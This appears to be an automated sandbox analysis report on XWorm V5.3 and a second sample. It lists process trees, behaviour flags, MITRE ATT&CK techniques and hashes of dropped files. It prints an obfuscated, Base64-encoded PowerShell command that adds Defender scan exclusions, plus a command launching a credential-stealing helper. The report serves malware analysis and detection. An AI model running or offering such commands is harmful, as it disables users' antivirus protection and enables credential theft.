  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
  2⤵
  PID:1460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,1045087159742745647,16194279797314856730,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
  2⤵
  PID:448

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3312

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x4cc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2256

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3984

C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm V5.3.exe
"C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm V5.3.exe"
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAdQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZgBsACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748
- C:\Windows\Progman.exe
  "C:\Windows\Progman.exe"
  2⤵
  - Executes dropped EXE
  PID:2020
- C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe
  "C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Enumerates system info in registry
  PID:2828

C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm V5.3.exe
"C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm V5.3.exe"
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4352
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAdQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZgBsACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\Progman.exe
  "C:\Windows\Progman.exe"
  2⤵
  - Executes dropped EXE
  PID:2036
- C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe
  "C:\Users\Admin\Downloads\XWorm_V5.3\XWorm_V5.3\XWorm.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1452

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:532

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2fc 0x4cc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8996946f8,0x7ff899694708,0x7ff899694718
  2⤵
  PID:8
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
  2⤵
  PID:2380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:1836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:4772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5044 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
  2⤵
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
  2⤵
  PID:3008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:1012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4560 /prefetch:8
  2⤵
  PID:1328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5540 /prefetch:8
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:1040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6328 /prefetch:8
  2⤵
  PID:4240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1424
- C:\Users\Admin\Downloads\virussssssssssssss.exe
  "C:\Users\Admin\Downloads\virussssssssssssss.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2212
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json
    3⤵
    PID:2844
  - - C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
      All-In-One.exe OutPut.json
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Accesses Microsoft Outlook accounts
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4960
- C:\Users\Admin\Downloads\virussssssssssssss.exe
  "C:\Users\Admin\Downloads\virussssssssssssss.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,109918326257341398,13131277443985535100,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2764 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3444

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4132

C:\Users\Admin\Downloads\virussssssssssssss.exe
"C:\Users\Admin\Downloads\virussssssssssssss.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2620

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm.exe.log

Filesize
1KB

MD5
e49b3887f8f593b8e7a459599c2081d4

SHA1
be20acd929d0522fa797aef91fc33d56e904ccd6

SHA256
0933e2b25e87c8c4c6d730f6b177b6cabc750b16b0f058749e1ed2a390c146b8

SHA512
4d253851fca642454c9df2b3860bdbce1fa041b36b195acaf39bb770617efbb05c0cc8ee73b7160204dac0cfa885cd651d92a1d6e032a28a9088f77ce9873f72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
53bc70ecb115bdbabe67620c416fe9b3

SHA1
af66ec51a13a59639eaf54d62ff3b4f092bb2fc1

SHA256
b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771

SHA512
cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e765f3d75e6b0e4a7119c8b14d47d8da

SHA1
cc9f7c7826c2e1a129e7d98884926076c3714fc0

SHA256
986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89

SHA512
a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d2b36bcbe0b9522375bdbcca6cdb8249

SHA1
d3081677b01cd1e6879cfb34c98ed82a6e9c3cee

SHA256
2e6fe03daf2cda49400149ac21a595583b46a6a647df24a1186d9a18fd7e6164

SHA512
1b0d3a65984565c50e54a91769f83c041d0ff775ef53e6772ec9502d721c548a6afe489c6ea0b108ff74654a7bdede65905288a323c0cd51dea414cac46f9ce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

Filesize
44KB

MD5
53fdd7c885de913a413f10c7534a0f99

SHA1
305c0898c51b8c15ab63b603938aaff5df17fd54

SHA256
474b94b4cf158efb8ad48ff70797b08155aed548b38a75c32fc4c3014e11b9a7

SHA512
e07353c15561b60094f4d972998a4fc1254c24dd619caf3e0dcefebd50ce5f416825caee162211dbd5ff9e4b84c46ffb7c8f82630e9f8071e34b81403a11d75f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

Filesize
264KB

MD5
9f640a2c81749b61b3a03f9d7e7814af

SHA1
8f1b3a29ce017dfa2b0e927e5618c23d49f0c791

SHA256
a785b51d0723731ed81ea75891c101908cf2d8c82d130aef0a45519afdcc4b91

SHA512
24890bce416254fd40c8a59b9ae54fa9f206cc5ddc8c784b7e3ff9167ee89b9068bbc8ded2ba708b0489dfce4b95ba7611513d3327b26e66e1cf468028e3113e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

Filesize
1.0MB

MD5
ec772161a1a7c0a12af0a87d1c6c9a49

SHA1
b41e930c7bf2f126b70a3eb9905adae6c3591cc9

SHA256
e849950812b6559132663651d78e5ac5d3d43a17adf62af67ec05a84e1102718

SHA512
adeb75354e27c5cae5777a284ce218c7585fd1ee3868e9ab271748f77d9cd3abfe19f64f3cf0d8bced10752f2d042fd4ef73fd79c8183e56e56878fe821b1d8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

Filesize
4.0MB

MD5
39ead4e00d5e4f78a593d574702736f3

SHA1
56350a020920d9e24ab9860d0be309ce2d9d0da7

SHA256
f709643a4a49c201c48ff9636175ba17e2c726da495fc0af88d8e585fcaf3f2b

SHA512
407e75fcaa387e424732a0ab82a58a4d825ad92830ea82f66e13a9541a469ac449e1cda53d8a8a5a59493d0c9c6c837c70553c0af93dfca5c2475454f4f8a1a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
21KB

MD5
b1dfa46eee24480e9211c9ef246bbb93

SHA1
80437c519fac962873a5768f958c1c350766da15

SHA256
fc79a40b2172a04a5c2fe0d5111ebeb401b9a84ce80c6e9e5b96c9c73c9b0398

SHA512
44aefedf8a4c0c8cbc43c1260dc2bbc4605f83a189b6ef50e99058f54a58b61eb88af3f08164671bad4bd9c5e3b97b755f2fa433490bef56aa15cdf37fb412b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
17KB

MD5
950eca48e414acbe2c3b5d046dcb8521

SHA1
1731f264e979f18cdf08c405c7b7d32789a6fb59

SHA256
c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2

SHA512
27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
e4a3a7066cc76a701b412d49b42e2973

SHA1
cfc030af34faa999cc1e31a2599f63c2c55fbf31

SHA256
97a77ac8f575aaea84d7968460a27eb6e71b7a7dbd9ea5e9478ac13c67227547

SHA512
99f3bba9c6cf11797df14b7012fe2b90729c0ccc6b0171d10876491312273a9a2644d5d16576d59b885d47c818069a82981c6cfa0fed63b9b7331226be27940b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
347e9246f5df8b774b8bffcb46210071

SHA1
71142d5449d9a74edfc410d20a3e0fd3fc2b2461

SHA256
37384f6b027a7131df1a6247ee91454a2fb7b660ab402ad8b1e21a07bc42d27d

SHA512
7b894de83211c8fb20913491a4e0882b011437762a495ef600db9329a361bbac45386d441f69b321e61212366c33a6bd68a4baf515a4ae8063f498092b673fab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
f77e4847e3576e70bf59f21041e222f2

SHA1
c69701ba3377d26d72480fd2b1fa5c4a2427c6de

SHA256
f383fb63e0246a722f6adc88fe4d9e938ab170b969d5a2cc5d1e0d7f97394078

SHA512
59632e5b570558bcccb17e138a5778384c84d51af4302e98d7592d741729f8bf41f9dfbb54a377866e68e09779fdbd9f2183b46b6317a49255665d7d40a14030

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
319B

MD5
29b67b8b617f8c84877dafc913de8ef7

SHA1
9d79f98c93bf4ab9044e4fa23fce84a95f677a3b

SHA256
188e08b412765d710be8073e469b707f366356c8963c980328a59fe972652d53

SHA512
c6a10e4b185bf1629258a0cc46a4c93d3f7c430178ec30d3e305d9ef03eaa35aca9896f25e635b61d2702212e3df4945392670e1b6ac34a4eb703f5b3bbcd2d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
fc64d67c907fce93c10a2b268311e675

SHA1
e57def25bbf11af9a873402bb125fd37b3417503

SHA256
9a102ba8a5a081d66adebff9c29c56898e8b7b700736c7467a9bd067ff101781

SHA512
235922e7d5e285eaed098e5317ba501fe0bd955a7683989a67668a418adacfdae7d62087f5c2175f8e8bb3e1bccb8d65bd1cc85a24e989fe3ec9044a7ef27bf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
25f39e68529855c2b3ded01932ffac2b

SHA1
0790ec98722ef1aa6ee0bf1593507c2dc7fdc4c2

SHA256
48b594c1d75b9a3622a17f98d3c300bf9d8dd6edb22061f406eda96d985860d5

SHA512
74002753394ff5478da3ead0ce2d7b08cc0873cd8eb146a977447b547f08e3cee1b894cac94088b8a705a95df9a82deb2efc3f06f6ed8cfd3a868f399ff8b68c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
9dd4bbc969da459d1cfc910ca738aeaa

SHA1
c46c948e9bc3fa4e138b251a543004aa1dceecab

SHA256
d987691406d20b0ddb8153b855f0f51d23e40f22426cfd0117b62e76047570eb

SHA512
515d5fe386d5d33c1be1e2453311ca7d9933805737bc671570d778082c08f275688d91c0c227ecc92bc227f3142b879c1278b40941df7093db13a6a688b57d13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
849B

MD5
8382dea5237ffba9f833dccebb4d285a

SHA1
fbb62560ae684e266f0efad748f5c6e629691881

SHA256
445370b418ef0608b754e8db0ad418a0289fba6bce010c818afed93b1efe8a60

SHA512
022a776b6fbcf5f644d21ce0a35f93ad428046de7323e3346aeeb66488acb5a1836a54382a97063a1fa43e7d573ec5c607c036eb5e1401e45c7ccb6af9b48730

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
2KB

MD5
ca91507b162a1881ffaeb8532b3c5232

SHA1
004ab6c4fbc74334be3f43afb5735e0aa1db474c

SHA256
7c9b3ebf776297358f58eedd9c5d67521203a30004940385f74260a8d60145cb

SHA512
5fe9fc9cbf3acedf5c44c6df983b257ea6a2e61b37f9eb871dd97b7ddbe94dd12a807483c0da7c1c48da3c3be2a89b456e792646f2ed4a2fb56e63d68257fc43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
328B

MD5
73499671084b315af8099f2dbe2459e5

SHA1
1c2d35b26f2bcae0571f15e00742e6f5d563719b

SHA256
c24bba6d7f6f9d3f37332b46bfa922c37d2300d2bce42f3746b7e8ddd6627a9a

SHA512
ddbdb07531ff7a2de153410635d21ab604a636f14c43d07db0ff4b2ed04fae7dbb4b8271d42711d6fe4dc0b06124c99bc2ff7debb94da39e3057f40724136f7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Filesize
48KB

MD5
830117ac37c98a18b01dd5eced2445cd

SHA1
af590fca7961ca086ba4ee0e4cd81f536a1a507f

SHA256
d0c0789171acafeb17904e9ce40d097b4ad39de835fda005e3541edbd3fdd1d1

SHA512
2aa99f3255174ba9dc57db54ac53645f3ab81da6eaec5249050c150d3e63bc274cfd29abd7fce2de6fd9f55a6ad818580be2840542a5c211fb3d2d16e2f8fb3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
188B

MD5
008114e1a1a614b35e8a7515da0f3783

SHA1
3c390d38126c7328a8d7e4a72d5848ac9f96549b

SHA256
7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18

SHA512
